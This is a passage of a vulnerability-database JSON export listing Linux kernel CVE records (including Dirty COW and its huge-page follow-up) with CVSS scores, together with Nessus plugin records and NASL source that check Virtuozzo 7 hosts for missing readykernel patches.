without going through a COW cycle. This bug is not as severe as the original \"Dirty cow\" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp.", "edition": 16, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-30T22:29:00", "title": "CVE-2017-1000405", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000405"], "modified": "2018-02-13T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.14"], "id": "CVE-2017-1000405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000405", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.14:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:26", "description": "The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages.", "edition": 19, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-24T10:29:00", "title": "CVE-2017-16939", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16939"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2017-16939", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16939", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T20:13:38", "description": "The dccp_disconnect function in net/dccp/proto.c in the Linux kernel through 4.14.3 allows local users to gain privileges or cause a denial of service (use-after-free) via an AF_UNSPEC connect system call during the DCCP_LISTEN state.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-05T09:29:00", "title": "CVE-2017-8824", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8824"], "modified": "2018-12-13T11:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.14.3"], "id": "CVE-2017-8824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8824", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.14.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:39", "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 17, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T21:59:00", "title": "CVE-2016-5195", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5195"], "modified": "2020-02-17T16:15:00", "cpe": ["cpe:/o:redhat:enterprise_linux_aus:6.2", "cpe:/o:redhat:enterprise_linux_eus:7.1", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux_long_life:5.6", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_eus:6.6", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux_aus:6.5", "cpe:/o:redhat:enterprise_linux_eus:6.7", "cpe:/o:redhat:enterprise_linux_tus:6.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_long_life:5.9", "cpe:/o:redhat:enterprise_linux_aus:6.4", "cpe:/o:canonical:ubuntu_core:15.04", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2016-5195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_core:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.9:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.5:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-06T09:13:18", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-110)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "modified": "2017-12-12T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-110.NASL", "href": "https://www.tenable.com/plugins/nessus/105166", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105166);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-110)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909950\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6bc504c3\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:17", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-109)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "modified": "2017-12-12T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-109.NASL", "href": "https://www.tenable.com/plugins/nessus/105165", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105165);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-109)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909949\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.10-39.2-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0bdc5b07\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.15-39.2-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c98f8bd6\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.10\",\n \"patch\",\"readykernel-patch-30.10-39.2-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.15\",\n \"patch\",\"readykernel-patch-30.15-39.2-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:25", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A vulnerability was found in DCCP socket handling code.\n dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - The function get_net_ns_by_id() does not check the\n net.count value when processing a peer network, which\n could lead to double free and memory corruption. An\n unprivileged local user could use this vulnerability to\n crash the system.\n\n - If the system uses iptables and there are iptables\n rules with TCPMSS action there, a remote attacker could\n cause a denial of service (use-after-free in\n tcpmss_mangle_packet function leading to memory\n corruption) or possibly have unspecified other impact\n by sending specially crafted network packets.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, could exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 33, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-16T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2018-004)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-15129", "CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-18017", "CVE-2017-1000405"], "modified": "2018-01-16T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2018-004.NASL", "href": "https://www.tenable.com/plugins/nessus/106052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106052);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-15129\",\n \"CVE-2017-16939\",\n \"CVE-2017-18017\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2018-004)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A vulnerability was found in DCCP socket handling code.\n dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - The function get_net_ns_by_id() does not check the\n net.count value when processing a peer network, which\n could lead to double free and memory corruption. An\n unprivileged local user could use this vulnerability to\n crash the system.\n\n - If the system uses iptables and there are iptables\n rules with TCPMSS action there, a remote attacker could\n cause a denial of service (use-after-free in\n tcpmss_mangle_packet function leading to memory\n corruption) or possibly have unspecified other impact\n by sending specially crafted network packets.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, could exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2915392\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-15.2-42.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ab3589df\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-18.7-42.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8dcc35e\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-20.18-42.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6312859\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 